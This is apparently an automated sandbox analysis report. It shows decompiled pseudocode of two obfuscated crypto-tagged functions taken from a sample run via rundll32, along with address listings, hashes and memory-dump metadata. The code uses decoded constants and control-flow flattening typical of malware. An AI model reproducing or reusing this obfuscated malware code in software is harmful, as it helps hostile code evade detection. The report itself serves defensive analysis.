                                                                                                                      • Opcode Fuzzy Hash: 5b08e9dbcbe72183f65bc00083dd8b9667ad7d5dfeacba7cbb0734b26863e533
                                                                                                                      • Instruction Fuzzy Hash: 88513DB4A002189BDB14EBA8CC95BEEB7B1FF48308F104169E5066F2C2DF75A991CF44
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00682251 Relevance: 14.1, Strings: 11, Instructions: 340COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 96%
                                                                                                                      			E00682251(void* __ecx, signed int* __edx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				void* _t323;
				signed int _t369;
				signed int _t371;
				signed int _t372;
				signed int _t373;
				signed int _t374;
				signed int _t375;
				signed int _t376;
				signed int _t377;
				signed int _t378;
				signed int _t379;
				void* _t382;
				signed int* _t424;
				void* _t427;
				void* _t428;
				void* _t431;

				_t425 = _a4;
				_push(_a12);
				_t424 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E006920B9(_t323);
				_v104 = 0xfd7ba2;
				_t428 = _t427 + 0x14;
				_v104 = _v104 << 2;
				_v104 = _v104 ^ 0x03f5ee88;
				_t382 = 0x3e8dc94;
				_v112 = 0x53a35e;
				_t371 = 0x1c;
				_v112 = _v112 / _t371;
				_v112 = _v112 << 0xb;
				_v112 = _v112 ^ 0x17ec1018;
				_v100 = 0x45b9a1;
				_v100 = _v100 + 0xffff7cfc;
				_v100 = _v100 ^ 0x004aa95b;
				_v92 = 0xd93693;
				_v92 = _v92 + 0xb87a;
				_v92 = _v92 ^ 0x00df4f59;
				_v160 = 0x746cf1;
				_v160 = _v160 ^ 0x2b133776;
				_v160 = _v160 + 0xffff944c;
				_v160 = _v160 / _t371;
				_v160 = _v160 ^ 0x0189d9d1;
				_v144 = 0x9ec305;
				_v144 = _v144 + 0xffffd43e;
				_v144 = _v144 << 3;
				_v144 = _v144 ^ 0x04f670ec;
				_v148 = 0x64c482;
				_v148 = _v148 + 0x3823;
				_t372 = 0x6f;
				_v148 = _v148 / _t372;
				_v148 = _v148 ^ 0x000f1a49;
				_v68 = 0x131d36;
				_v68 = _v68 ^ 0xb06b804d;
				_v68 = _v68 ^ 0xb072f73d;
				_v124 = 0xcf68d3;
				_v124 = _v124 + 0x418a;
				_v124 = _v124 + 0xdb2c;
				_v124 = _v124 ^ 0x00d4c88c;
				_v140 = 0x60ea9a;
				_v140 = _v140 >> 0xa;
				_v140 = _v140 >> 4;
				_v140 = _v140 ^ 0x0002f747;
				_v116 = 0xa906b8;
				_t373 = 0x61;
				_v116 = _v116 * 0x66;
				_v116 = _v116 / _t373;
				_v116 = _v116 ^ 0x00b9e105;
				_v152 = 0x1b4b23;
				_v152 = _v152 + 0x6529;
				_v152 = _v152 << 7;
				_v152 = _v152 ^ 0x0dd37b6c;
				_v56 = 0xb64e13;
				_t374 = 0x36;
				_v56 = _v56 / _t374;
				_v56 = _v56 ^ 0x000ccadc;
				_v180 = 0xa61587;
				_v180 = _v180 ^ 0x79fc160a;
				_t375 = 0x7a;
				_v180 = _v180 * 0x16;
				_v180 = _v180 ^ 0x4f1bf23d;
				_v180 = _v180 ^ 0x22abe71e;
				_v120 = 0x473252;
				_v120 = _v120 + 0xffff4692;
				_v120 = _v120 / _t375;
				_v120 = _v120 ^ 0x000f54d2;
				_v60 = 0x2fd158;
				_v60 = _v60 + 0x5b64;
				_v60 = _v60 ^ 0x0034a0e9;
				_v84 = 0xc57bbf;
				_v84 = _v84 ^ 0x7beef004;
				_v84 = _v84 ^ 0x7b204221;
				_v52 = 0xc39e48;
				_t376 = 0x4d;
				_v52 = _v52 / _t376;
				_v52 = _v52 ^ 0x0006d078;
				_v108 = 0x102acf;
				_v108 = _v108 >> 0xa;
				_v108 = _v108 ^ 0x000242b6;
				_v80 = 0xaaee53;
				_t377 = 0x79;
				_v80 = _v80 * 0x74;
				_v80 = _v80 ^ 0x4d7dabdb;
				_v88 = 0x1ad2b9;
				_v88 = _v88 | 0x310da8db;
				_v88 = _v88 ^ 0x311cb062;
				_v136 = 0x81cc6c;
				_v136 = _v136 >> 0xc;
				_v136 = _v136 << 0xd;
				_v136 = _v136 ^ 0x0107e876;
				_v96 = 0x2bc0c4;
				_v96 = _v96 * 0x4c;
				_v96 = _v96 ^ 0x0cfd01fe;
				_v176 = 0x403c4e;
				_t174 =  &_v176; // 0x403c4e
				_v176 =  *_t174 / _t377;
				_t180 =  &_v176; // 0x403c4e
				_v176 =  *_t180 * 0x5e;
				_v176 = _v176 << 5;
				_v176 = _v176 ^ 0x0632c8a8;
				_v44 = 0x1618ce;
				_v44 = _v44 + 0xffff8813;
				_v44 = _v44 ^ 0x00124c47;
				_v76 = 0x551030;
				_v76 = _v76 + 0x65ef;
				_v76 = _v76 ^ 0x005f521e;
				_v132 = 0xb7ed4f;
				_v132 = _v132 << 0xb;
				_v132 = _v132 >> 0xa;
				_v132 = _v132 ^ 0x002e4b92;
				_v64 = 0xfb13c3;
				_v64 = _v64 * 0x16;
				_v64 = _v64 ^ 0x159ca6b2;
				_v168 = 0x8e8363;
				_v168 = _v168 ^ 0x49fc5726;
				_v168 = _v168 >> 8;
				_v168 = _v168 >> 4;
				_v168 = _v168 ^ 0x0002bf0f;
				_v72 = 0x8b4c84;
				_t378 = 0x68;
				_v72 = _v72 / _t378;
				_v72 = _v72 ^ 0x00015b8a;
				_v128 = 0x282e65;
				_v128 = _v128 >> 3;
				_v128 = _v128 << 9;
				_v128 = _v128 ^ 0x0a079d52;
				_v156 = 0xadd370;
				_t379 = 0x3e;
				_v156 = _v156 / _t379;
				_v156 = _v156 << 0xf;
				_v156 = _v156 + 0xffff35e7;
				_v156 = _v156 ^ 0x66d9d095;
				_v164 = 0xb0b7ce;
				_v164 = _v164 + 0xffffdc7a;
				_v164 = _v164 * 0x61;
				_v164 = _v164 + 0xffff24b0;
				_v164 = _v164 ^ 0x42ea90cd;
				_v172 = 0xee7b33;
				_v172 = _v172 | 0x904c1683;
				_v172 = _v172 * 0x2c;
				_v172 = _v172 >> 4;
				_v172 = _v172 ^ 0x0e8d9d52;
				_v48 = 0xdaf5e6;
				_v48 = _v48 ^ 0xf4ca4d64;
				_v48 = _v48 ^ 0xf41f1779;
				goto L1;
				do {
					while(1) {
						L1:
						_t431 = _t382 - 0x9c1484f;
						if(_t431 > 0) {
							break;
						}
						if(_t431 == 0) {
							E00683DBC( &_v40, _t424, _v160, _v144, _v148);
							_t428 = _t428 + 0xc;
							_t382 = 0x9229f3e;
							continue;
						} else {
							if(_t382 == 0x3e8dc94) {
								_t382 = 0xb0d10f2;
								 *_t424 =  *_t424 & 0x00000000;
								_t424[1] = _v104;
								continue;
							} else {
								if(_t382 == 0x73dcb22) {
									E00690DAF(_v176,  &_v40, _v44,  *((intOrPtr*)(_t425 + 0x44)), _v76, _v132);
									_t428 = _t428 + 0x10;
									_t382 = 0xca0d778;
									continue;
								} else {
									if(_t382 == 0x8cfc35c) {
										E00690DAF(_v60,  &_v40, _v84,  *((intOrPtr*)(_t425 + 0x3c)), _v52, _v108);
										_t428 = _t428 + 0x10;
										_t382 = 0xfa9ed0f;
										continue;
									} else {
										if(_t382 == 0x9229f3e) {
											E006A0E3A( &_v40, _v68, __eflags, _v124, _v140, _v116, _t425 + 0x1c);
											_t428 = _t428 + 0x10;
											_t382 = 0xa7e786e;
											continue;
										} else {
											if(_t382 != 0x95701e8) {
												goto L24;
											} else {
												_push(_t382);
												_push(_t382);
												_t369 = E00687FF2(_t424[1]);
												 *_t424 = _t369;
												if(_t369 != 0) {
													_t382 = 0x9c1484f;
													continue;
												}
											}
										}
									}
								}
							}
						}
						L27:
						__eflags =  *_t424;
						_t322 =  *_t424 != 0;
						__eflags = _t322;
						return 0 | _t322;
					}
					__eflags = _t382 - 0xa7e786e;
					if(_t382 == 0xa7e786e) {
						E00690DAF(_v152,  &_v40, _v56,  *((intOrPtr*)(_t425 + 0x48)), _v180, _v120);
						_t428 = _t428 + 0x10;
						_t382 = 0x8cfc35c;
						goto L24;
					} else {
						__eflags = _t382 - 0xa84b454;
						if(__eflags == 0) {
							E006A0E3A( &_v40, _v156, __eflags, _v164, _v172, _v48, _t425 + 0x14);
						} else {
							__eflags = _t382 - 0xb0d10f2;
							if(_t382 == 0xb0d10f2) {
								_t424[1] = E0069C631(_t425);
								_t382 = 0x95701e8;
								goto L1;
							} else {
								__eflags = _t382 - 0xca0d778;
								if(_t382 == 0xca0d778) {
									E00690DAF(_v64,  &_v40, _v168,  *_t425, _v72, _v128);
									_t428 = _t428 + 0x10;
									_t382 = 0xa84b454;
									goto L1;
								} else {
									__eflags = _t382 - 0xfa9ed0f;
									if(_t382 != 0xfa9ed0f) {
										goto L24;
									} else {
										E00690DAF(_v80,  &_v40, _v88,  *((intOrPtr*)(_t425 + 0x30)), _v136, _v96);
										_t428 = _t428 + 0x10;
										_t382 = 0x73dcb22;
										goto L1;
									}
								}
							}
						}
					}
					goto L27;
					L24:
					__eflags = _t382 - 0xd4a25d5;
				} while (__eflags != 0);
				goto L27;
			}























































                                                                                                                      0x0068225a
                                                                                                                      0x00682262
                                                                                                                      0x00682269
                                                                                                                      0x0068226b
                                                                                                                      0x00682272
                                                                                                                      0x00682273
                                                                                                                      0x00682274
                                                                                                                      0x00682275
                                                                                                                      0x0068227a
                                                                                                                      0x00682282
                                                                                                                      0x00682285
                                                                                                                      0x0068228c
                                                                                                                      0x00682294
                                                                                                                      0x00682299
                                                                                                                      0x006822a7
                                                                                                                      0x006822ac
                                                                                                                      0x006822b0
                                                                                                                      0x006822b5
                                                                                                                      0x006822bd
                                                                                                                      0x006822c5
                                                                                                                      0x006822cd
                                                                                                                      0x006822d5
                                                                                                                      0x006822dd
                                                                                                                      0x006822e5
                                                                                                                      0x006822ed
                                                                                                                      0x006822f5
                                                                                                                      0x006822fd
                                                                                                                      0x0068230d
                                                                                                                      0x00682313
                                                                                                                      0x0068231b
                                                                                                                      0x00682323
                                                                                                                      0x0068232b
                                                                                                                      0x00682330
                                                                                                                      0x00682338
                                                                                                                      0x00682340
                                                                                                                      0x0068234c
                                                                                                                      0x00682351
                                                                                                                      0x00682357
                                                                                                                      0x0068235f
                                                                                                                      0x0068236a
                                                                                                                      0x00682375
                                                                                                                      0x00682380
                                                                                                                      0x00682388
                                                                                                                      0x00682390
                                                                                                                      0x00682398
                                                                                                                      0x006823a0
                                                                                                                      0x006823a8
                                                                                                                      0x006823ad
                                                                                                                      0x006823b2
                                                                                                                      0x006823ba
                                                                                                                      0x006823c7
                                                                                                                      0x006823c8
                                                                                                                      0x006823d2
                                                                                                                      0x006823d6
                                                                                                                      0x006823de
                                                                                                                      0x006823e6
                                                                                                                      0x006823ee
                                                                                                                      0x006823f3
                                                                                                                      0x006823fd
                                                                                                                      0x00682411
                                                                                                                      0x00682416
                                                                                                                      0x0068241f
                                                                                                                      0x0068242a
                                                                                                                      0x00682432
                                                                                                                      0x0068243f
                                                                                                                      0x00682442
                                                                                                                      0x00682446
                                                                                                                      0x0068244e
                                                                                                                      0x00682456
                                                                                                                      0x0068245e
                                                                                                                      0x0068246e
                                                                                                                      0x00682472
                                                                                                                      0x0068247a
                                                                                                                      0x00682485
                                                                                                                      0x00682490
                                                                                                                      0x0068249b
                                                                                                                      0x006824a3
                                                                                                                      0x006824ab
                                                                                                                      0x006824b3
                                                                                                                      0x006824c5
                                                                                                                      0x006824ca
                                                                                                                      0x006824d3
                                                                                                                      0x006824de
                                                                                                                      0x006824e6
                                                                                                                      0x006824eb
                                                                                                                      0x006824f3
                                                                                                                      0x00682500
                                                                                                                      0x00682501
                                                                                                                      0x00682505
                                                                                                                      0x0068250d
                                                                                                                      0x00682515
                                                                                                                      0x0068251d
                                                                                                                      0x00682525
                                                                                                                      0x0068252d
                                                                                                                      0x00682532
                                                                                                                      0x00682537
                                                                                                                      0x0068253f
                                                                                                                      0x0068254c
                                                                                                                      0x00682550
                                                                                                                      0x00682558
                                                                                                                      0x00682560
                                                                                                                      0x00682566
                                                                                                                      0x0068256a
                                                                                                                      0x0068256f
                                                                                                                      0x00682573
                                                                                                                      0x00682578
                                                                                                                      0x00682580
                                                                                                                      0x0068258b
                                                                                                                      0x00682596
                                                                                                                      0x006825a1
                                                                                                                      0x006825a9
                                                                                                                      0x006825b1
                                                                                                                      0x006825b9
                                                                                                                      0x006825c1
                                                                                                                      0x006825c6
                                                                                                                      0x006825cb
                                                                                                                      0x006825d3
                                                                                                                      0x006825e6
                                                                                                                      0x006825ed
                                                                                                                      0x006825f8
                                                                                                                      0x00682600
                                                                                                                      0x00682608
                                                                                                                      0x0068260d
                                                                                                                      0x00682612
                                                                                                                      0x0068261c
                                                                                                                      0x00682635
                                                                                                                      0x0068263a
                                                                                                                      0x00682643
                                                                                                                      0x0068264e
                                                                                                                      0x00682656
                                                                                                                      0x0068265b
                                                                                                                      0x00682660
                                                                                                                      0x00682668
                                                                                                                      0x00682674
                                                                                                                      0x0068267c
                                                                                                                      0x00682680
                                                                                                                      0x00682685
                                                                                                                      0x0068268d
                                                                                                                      0x00682695
                                                                                                                      0x0068269d
                                                                                                                      0x006826aa
                                                                                                                      0x006826ae
                                                                                                                      0x006826b6
                                                                                                                      0x006826be
                                                                                                                      0x006826c6
                                                                                                                      0x006826d3
                                                                                                                      0x006826d7
                                                                                                                      0x006826dc
                                                                                                                      0x006826e4
                                                                                                                      0x006826ef
                                                                                                                      0x006826fa
                                                                                                                      0x006826fa
                                                                                                                      0x00682705
                                                                                                                      0x00682705
                                                                                                                      0x00682705
                                                                                                                      0x00682705
                                                                                                                      0x00682707
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0068270d
                                                                                                                      0x0068282a
                                                                                                                      0x0068282f
                                                                                                                      0x00682832
                                                                                                                      0x00000000
                                                                                                                      0x00682713
                                                                                                                      0x00682719
                                                                                                                      0x00682808
                                                                                                                      0x0068280a
                                                                                                                      0x0068280d
                                                                                                                      0x00000000
                                                                                                                      0x0068271f
                                                                                                                      0x00682725
                                                                                                                      0x006827f2
                                                                                                                      0x006827f7
                                                                                                                      0x006827fa
                                                                                                                      0x00000000
                                                                                                                      0x0068272b
                                                                                                                      0x00682731
                                                                                                                      0x006827c0
                                                                                                                      0x006827c5
                                                                                                                      0x006827c8
                                                                                                                      0x00000000
                                                                                                                      0x00682733
                                                                                                                      0x00682739
                                                                                                                      0x0068278b
                                                                                                                      0x00682790
                                                                                                                      0x00682793
                                                                                                                      0x00000000
                                                                                                                      0x0068273b
                                                                                                                      0x00682741
                                                                                                                      0x00000000
                                                                                                                      0x00682747
                                                                                                                      0x00682756
                                                                                                                      0x00682757
                                                                                                                      0x00682758
                                                                                                                      0x0068275d
                                                                                                                      0x00682763
                                                                                                                      0x00682769
                                                                                                                      0x00000000
                                                                                                                      0x00682769
                                                                                                                      0x00682763
                                                                                                                      0x00682741
                                                                                                                      0x00682739
                                                                                                                      0x00682731
                                                                                                                      0x00682725
                                                                                                                      0x00682719
                                                                                                                      0x0068293e
                                                                                                                      0x00682940
                                                                                                                      0x00682945
                                                                                                                      0x00682945
                                                                                                                      0x0068294f
                                                                                                                      0x0068294f
                                                                                                                      0x0068283c
                                                                                                                      0x00682842
                                                                                                                      0x006828fd
                                                                                                                      0x00682902
                                                                                                                      0x00682905
                                                                                                                      0x00000000
                                                                                                                      0x00682848
                                                                                                                      0x00682848
                                                                                                                      0x0068284e
                                                                                                                      0x00682936
                                                                                                                      0x00682854
                                                                                                                      0x00682854
                                                                                                                      0x00682856
                                                                                                                      0x006828d3
                                                                                                                      0x006828d6
                                                                                                                      0x00000000
                                                                                                                      0x00682858
                                                                                                                      0x00682858
                                                                                                                      0x0068285e
                                                                                                                      0x006828ba
                                                                                                                      0x006828bf
                                                                                                                      0x006828c2
                                                                                                                      0x00000000
                                                                                                                      0x00682860
                                                                                                                      0x00682860
                                                                                                                      0x00682866
                                                                                                                      0x00000000
                                                                                                                      0x0068286c
                                                                                                                      0x00682889
                                                                                                                      0x0068288e
                                                                                                                      0x00682891
                                                                                                                      0x00000000
                                                                                                                      0x00682891
                                                                                                                      0x00682866
                                                                                                                      0x0068285e
                                                                                                                      0x00682856
                                                                                                                      0x0068284e
                                                                                                                      0x00000000
                                                                                                                      0x0068290a
                                                                                                                      0x0068290a
                                                                                                                      0x0068290a
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: !B {$#8$)e$3{$N<@$R2G$d[$e.($nx~$nx~$e
                                                                                                                      • API String ID: 0-245365489
                                                                                                                      • Opcode ID: d6ff080ff9f5287ceac9ee7533765cfdb866e133be372a7cbfdcda9caf8f2759
                                                                                                                      • Instruction ID: 49eea34b549260cbc0bd602b65c028c91aa012bed437b265abffc52be2b37ead
                                                                                                                      • Opcode Fuzzy Hash: d6ff080ff9f5287ceac9ee7533765cfdb866e133be372a7cbfdcda9caf8f2759
                                                                                                                      • Instruction Fuzzy Hash: B5F142715083819FD7A8DF61C48A65BFBE2FFD4348F108A1DF29A86261D7B18958CF42
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00689714 Relevance: 14.0, Strings: 11, Instructions: 232COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 96%
                                                                                                                      			E00689714(void* __ecx, void* __edx) {
				signed int _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				void* _t251;
				intOrPtr _t252;
				intOrPtr _t253;
				void* _t257;
				signed int _t259;
				signed int _t260;
				signed int _t261;
				signed int _t262;
				signed int _t263;
				signed int _t264;
				void* _t292;
				void* _t293;
				signed int* _t296;
				signed int* _t297;

				_t296 =  &_v104;
				_v4 = _v4 & 0x00000000;
				_v12 = 0xc5b764;
				_v8 = 0xb6da07;
				_v100 = 0x6b81aa;
				_v100 = _v100 ^ 0x5133456b;
				_t8 =  &_v100; // 0x5133456b
				_v100 =  *_t8 * 0x6e;
				_t292 = __edx;
				_v100 = _v100 << 0xa;
				_v100 = _v100 ^ 0x922ec96f;
				_t257 = __ecx;
				_v20 = 0x2c208b;
				_t293 = 0x52ffaa2;
				_v20 = _v20 + 0xffff37e6;
				_v20 = _v20 ^ 0x00212911;
				_v60 = 0xb21c01;
				_v60 = _v60 ^ 0x31980a41;
				_v60 = _v60 + 0xffff033c;
				_v60 = _v60 ^ 0x31255444;
				_v64 = 0x612501;
				_v64 = _v64 << 2;
				_v64 = _v64 + 0xf44;
				_v64 = _v64 ^ 0x018d6347;
				_v52 = 0x111460;
				_v52 = _v52 + 0xffffc2ff;
				_v52 = _v52 | 0x8d441097;
				_v52 = _v52 ^ 0x8d5fe5cb;
				_v56 = 0xb6e38a;
				_t259 = 0x67;
				_v56 = _v56 / _t259;
				_t260 = 0x41;
				_v56 = _v56 * 0x32;
				_v56 = _v56 ^ 0x00536033;
				_v96 = 0xaa1e09;
				_v96 = _v96 / _t260;
				_t261 = 0x73;
				_v96 = _v96 * 0xd;
				_v96 = _v96 / _t261;
				_v96 = _v96 ^ 0x00047537;
				_v88 = 0xebbfc;
				_v88 = _v88 << 7;
				_v88 = _v88 | 0x3053ba58;
				_t262 = 0x7f;
				_v88 = _v88 / _t262;
				_v88 = _v88 ^ 0x006c206b;
				_v44 = 0xece271;
				_v44 = _v44 + 0xffff86ef;
				_v44 = _v44 + 0x6a70;
				_v44 = _v44 ^ 0x00eb9b45;
				_v48 = 0xd70038;
				_v48 = _v48 | 0x378b661e;
				_v48 = _v48 ^ 0xfc23f8e2;
				_v48 = _v48 ^ 0xcbf8b4c1;
				_v92 = 0x86f3ef;
				_v92 = _v92 << 0xd;
				_v92 = _v92 >> 0xd;
				_v92 = _v92 + 0x4513;
				_v92 = _v92 ^ 0x000ef1b6;
				_v80 = 0x7a204;
				_v80 = _v80 + 0xffffa60a;
				_v80 = _v80 | 0x4d150135;
				_v80 = _v80 + 0xffff9d32;
				_v80 = _v80 ^ 0x4d179d3b;
				_v40 = 0x124198;
				_v40 = _v40 ^ 0x5335feb3;
				_t263 = 0x78;
				_v40 = _v40 * 0x18;
				_v40 = _v40 ^ 0xcbb00a78;
				_v84 = 0xcaa24a;
				_v84 = _v84 * 0x42;
				_v84 = _v84 ^ 0x45be5790;
				_v84 = _v84 + 0xffff0d2f;
				_v84 = _v84 ^ 0x718e360f;
				_v24 = 0x4d7038;
				_v24 = _v24 | 0x28b75b7a;
				_v24 = _v24 ^ 0x28f4655f;
				_v28 = 0x844762;
				_v28 = _v28 ^ 0xe0e1df8a;
				_v28 = _v28 ^ 0xe064bc9e;
				_v32 = 0xfc2930;
				_v32 = _v32 / _t263;
				_v32 = _v32 ^ 0x00028374;
				_v104 = 0xce3f74;
				_v104 = _v104 + 0x3224;
				_v104 = _v104 + 0x85ca;
				_t264 = 0xe;
				_v104 = _v104 / _t264;
				_v104 = _v104 ^ 0x0007887d;
				_v68 = 0x11fdc1;
				_v68 = _v68 | 0x0fd109af;
				_t265 = 0x52;
				_v68 = _v68 / _t265;
				_v68 = _v68 ^ 0x00367c27;
				_v72 = 0xa9a7e;
				_v72 = _v72 * 0x16;
				_v72 = _v72 ^ 0xca0bce5f;
				_v72 = _v72 ^ 0xcae4b7d2;
				_v76 = 0xb2d6c0;
				_v76 = _v76 + 0xffff5dcd;
				_v76 = _v76 >> 0xe;
				_v76 = _v76 >> 4;
				_v76 = _v76 ^ 0x0002e66e;
				_v16 = 0x41627;
				_v16 = _v16 + 0xccf7;
				_v16 = _v16 ^ 0x00091dff;
				_v36 = 0xd94625;
				_v36 = _v36 + 0x741;
				_v36 = _v36 << 0x10;
				_v36 = _v36 ^ 0x4d68793e;
				while(1) {
					L1:
					_t251 = 0xc3f018b;
					do {
						L2:
						while(_t293 != 0x52ffaa2) {
							if(_t293 == 0x865547f) {
								_t265 = _v80;
								_t252 = E0068CDAE(_v80, _v40, _v84,  *((intOrPtr*)(_t292 + 0x38)));
								_t296 =  &(_t296[2]);
								 *((intOrPtr*)(_t292 + 0x1c)) = _t252;
								__eflags = _t252;
								_t251 = 0xc3f018b;
								_t293 =  !=  ? 0xc3f018b : 0xb7a2405;
								continue;
							}
							if(_t293 == 0xb133873) {
								_push(_v64);
								_t253 = E0069C3A0(_t257, _v100, __eflags, _v20, _v60, _t265);
								_t297 =  &(_t296[4]);
								 *((intOrPtr*)(_t292 + 0x38)) = _t253;
								__eflags = _t253;
								if(_t253 != 0) {
									E00687B8B( *((intOrPtr*)(_t292 + 0x38)), _v52,  *((intOrPtr*)(_t292 + 0x38)), _v56, _v96);
									_push( *((intOrPtr*)(_t292 + 0x38)));
									_push(_v92);
									_push(_v48);
									_t265 = _v88;
									E00687C37(_v88, _v44);
									_t296 =  &(_t297[6]);
									_t293 = 0x865547f;
									goto L1;
								}
							} else {
								if(_t293 == 0xb7a2405) {
									return E00699E56(_v76, _v16, _v36,  *((intOrPtr*)(_t292 + 0x38)));
								}
								if(_t293 != _t251) {
									goto L13;
								} else {
									_t253 = E006846BE(_t265, _v24, _t265, _v28, _t265, _v32, _v104, _v68, _t265, _t292, E0068219A, _v72);
									_t296 =  &(_t296[0xa]);
									 *((intOrPtr*)(_t292 + 0x2c)) = _t253;
									if(_t253 == 0) {
										_t293 = 0xb7a2405;
										while(1) {
											L1:
											_t251 = 0xc3f018b;
											goto L2;
										}
									}
								}
							}
							return _t253;
						}
						_t293 = 0xb133873;
						L13:
						__eflags = _t293 - 0x1aeb2e;
					} while (__eflags != 0);
					return _t251;
				}
			}











































                                                                                                                      0x00689714
                                                                                                                      0x00689717
                                                                                                                      0x0068971c
                                                                                                                      0x00689724
                                                                                                                      0x0068972c
                                                                                                                      0x00689734
                                                                                                                      0x0068973c
                                                                                                                      0x00689745
                                                                                                                      0x00689749
                                                                                                                      0x0068974b
                                                                                                                      0x00689752
                                                                                                                      0x0068975a
                                                                                                                      0x0068975c
                                                                                                                      0x00689764
                                                                                                                      0x00689769
                                                                                                                      0x00689771
                                                                                                                      0x00689779
                                                                                                                      0x00689781
                                                                                                                      0x00689789
                                                                                                                      0x00689791
                                                                                                                      0x00689799
                                                                                                                      0x006897a1
                                                                                                                      0x006897a6
                                                                                                                      0x006897ae
                                                                                                                      0x006897b6
                                                                                                                      0x006897be
                                                                                                                      0x006897c6
                                                                                                                      0x006897ce
                                                                                                                      0x006897d6
                                                                                                                      0x006897e4
                                                                                                                      0x006897e9
                                                                                                                      0x006897f4
                                                                                                                      0x006897f7
                                                                                                                      0x006897fb
                                                                                                                      0x00689803
                                                                                                                      0x00689813
                                                                                                                      0x0068981c
                                                                                                                      0x0068981f
                                                                                                                      0x0068982b
                                                                                                                      0x0068982f
                                                                                                                      0x00689837
                                                                                                                      0x0068983f
                                                                                                                      0x00689844
                                                                                                                      0x00689850
                                                                                                                      0x00689853
                                                                                                                      0x00689857
                                                                                                                      0x0068985f
                                                                                                                      0x00689867
                                                                                                                      0x0068986f
                                                                                                                      0x00689877
                                                                                                                      0x0068987f
                                                                                                                      0x00689887
                                                                                                                      0x0068988f
                                                                                                                      0x00689897
                                                                                                                      0x0068989f
                                                                                                                      0x006898a7
                                                                                                                      0x006898ac
                                                                                                                      0x006898b1
                                                                                                                      0x006898b9
                                                                                                                      0x006898c1
                                                                                                                      0x006898c9
                                                                                                                      0x006898d3
                                                                                                                      0x006898e0
                                                                                                                      0x006898e8
                                                                                                                      0x006898f0
                                                                                                                      0x006898f8
                                                                                                                      0x00689907
                                                                                                                      0x0068990a
                                                                                                                      0x0068990e
                                                                                                                      0x00689916
                                                                                                                      0x00689923
                                                                                                                      0x00689927
                                                                                                                      0x0068992f
                                                                                                                      0x00689937
                                                                                                                      0x0068993f
                                                                                                                      0x00689947
                                                                                                                      0x0068994f
                                                                                                                      0x00689957
                                                                                                                      0x0068995f
                                                                                                                      0x00689967
                                                                                                                      0x0068996f
                                                                                                                      0x0068997f
                                                                                                                      0x00689983
                                                                                                                      0x0068998b
                                                                                                                      0x00689993
                                                                                                                      0x0068999b
                                                                                                                      0x006899a7
                                                                                                                      0x006899ac
                                                                                                                      0x006899b2
                                                                                                                      0x006899ba
                                                                                                                      0x006899c2
                                                                                                                      0x006899ce
                                                                                                                      0x006899d1
                                                                                                                      0x006899d5
                                                                                                                      0x006899dd
                                                                                                                      0x006899ea
                                                                                                                      0x006899ee
                                                                                                                      0x006899f6
                                                                                                                      0x006899fe
                                                                                                                      0x00689a06
                                                                                                                      0x00689a0e
                                                                                                                      0x00689a13
                                                                                                                      0x00689a18
                                                                                                                      0x00689a20
                                                                                                                      0x00689a28
                                                                                                                      0x00689a30
                                                                                                                      0x00689a38
                                                                                                                      0x00689a40
                                                                                                                      0x00689a48
                                                                                                                      0x00689a4d
                                                                                                                      0x00689a55
                                                                                                                      0x00689a55
                                                                                                                      0x00689a55
                                                                                                                      0x00689a5a
                                                                                                                      0x00000000
                                                                                                                      0x00689a5a
                                                                                                                      0x00689a6c
                                                                                                                      0x00689b32
                                                                                                                      0x00689b36
                                                                                                                      0x00689b3b
                                                                                                                      0x00689b3e
                                                                                                                      0x00689b41
                                                                                                                      0x00689b45
                                                                                                                      0x00689b4a
                                                                                                                      0x00000000
                                                                                                                      0x00689b4a
                                                                                                                      0x00689a78
                                                                                                                      0x00689ac5
                                                                                                                      0x00689ad8
                                                                                                                      0x00689add
                                                                                                                      0x00689ae0
                                                                                                                      0x00689ae3
                                                                                                                      0x00689ae5
                                                                                                                      0x00689afd
                                                                                                                      0x00689b02
                                                                                                                      0x00689b05
                                                                                                                      0x00689b09
                                                                                                                      0x00689b11
                                                                                                                      0x00689b15
                                                                                                                      0x00689b1a
                                                                                                                      0x00689b1d
                                                                                                                      0x00000000
                                                                                                                      0x00689b1d
                                                                                                                      0x00689a7a
                                                                                                                      0x00689a7c
                                                                                                                      0x00000000
                                                                                                                      0x00689b7a
                                                                                                                      0x00689a84
                                                                                                                      0x00000000
                                                                                                                      0x00689a8a
                                                                                                                      0x00689aae
                                                                                                                      0x00689ab3
                                                                                                                      0x00689ab6
